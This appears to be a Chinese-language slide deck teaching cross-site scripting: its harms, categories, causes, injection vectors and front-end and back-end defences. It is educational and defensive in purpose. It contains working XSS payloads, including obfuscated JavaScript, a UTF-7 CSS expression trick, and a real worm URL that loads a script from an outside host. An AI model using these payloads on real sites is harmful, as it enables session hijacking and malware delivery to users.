XSS是什么

• 跨网站脚本（Cross-site scripting，XSS）
• 是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。

无处不在的XSS

新浪漏洞类型统计

XSS危害

• alert('XSS');
• 一个alert有什么了不起？

XSS危害

挂马

• 插入恶意的脚本内容，运行病毒、木马

XSS危害

钓鱼

• 篡改网页内容，骗取账号、密码等诈骗行为

XSS危害

劫持会话

• 获取会话 COOKIE, 传送给第三方劫持身份

案例

• 发微博、人人网后台

XSS危害

xss蠕虫

• 使用 Ajax 技术，呈现链式传播

案例

• 微博6.28 xss事件
• http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

XSS分类

持久型

• cookie
• 数据库

非持久型

• URL，Form

XSS产生原因

• javascript的语法特性
• 无处不在的javascript
• 相信用户都是“良民”
• 太依赖前端验证
• 浏览器缺陷
• ……

常见XSS

javascript 代码注入

• eval
• setTimeout/setInterval
• document.write
• location.href
• new Function()
• fromCharCode
• 获取到不信任的字符串

猥琐的javascript

• String.fromCharCode(88,83,83)
• '\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029'.replace(/\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029/,\u0065\u0076\u0061\u006c)
• _=+[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$$=({}+"")[_____]+({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+ ({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")()

常见XSS

HTML 标签注入

• < > " ' \ & #
• src=javascript:alert('xss')
• onerror/onclick
• href=javascript:alert('xss')
• 更多变型：http://ha.ckers.org/xss.html

常见XSS

css注入

• expression
• url("javascript:alert('xss')")
• @import
• /**/
• @charset
• 更多变型：http://ha.ckers.org/xss.html

常见XSS

表单提交

• $_GET
• $_POST
• $_FILE
• type="hidden"

常见XSS

XSS Rootkit

• $_COOKIE
• $_SERVER

实例

• getenv('HTTP_CLIENT_IP')
• getenv('HTTP_X_FORWARDED_FOR')

常见XSS

富文本编辑器

• 形式千变万化
• 博客
• 轻微博
• UBB代码
• 更多变型：http://ha.ckers.org/xss.html

常见XSS

字符集编码

• @charset "utf-7";

body{80sec:expre/+ACoAKg/ssion(if(!window.x){alert(1);window.x=1})}

@charset "utf-7"：表明了css代码的编码格式为 utf-7，而根据utf-7的编码规则，是由 “+”开始，“-”结束的一堆代码（- 结尾非必要）。

那么 +ACoAKg- 即utf-7编码格式，经由浏览器转换成gbk之后，就变成了 /**/，变成css注释，代码实际变为：

expression(if(!window.x){alert(1);window.x=1})

常见XSS

flashvars

• js可以跟flash通过flashvars进行交互
• flash crossdomain.xml跨域

XSS防范

前端策略

• 慎用之前提到的eval等函数
• 安全的cookie策略，增加客户端属性
• 统一编码UTF-8
• ajax提交参数使用encodeURIComponent编码
• 注意字符转义
• 慎用document.domain
• 禁止引入第三方js、css文件

XSS防范

后端防范

• 永远不要相信用户输入的内容！
• $_GET、$_POST、$_REQUEST、$_SERVER、$_COOKIE、$_FILE、$_ENV
• 尽量采用post
• 输入类型、验证、过滤、转义；输出内容编码
• SQL安全：mysql_real_escape_string
• refer检查
• 白(黑)名单策略：标签白名单、refer白名单
• session

资料

• http://www.80sec.com
• http://www.wooyun.org
• http://xssed.com
• http://ha.ckers.org/xss.html
• http://html5sec.org/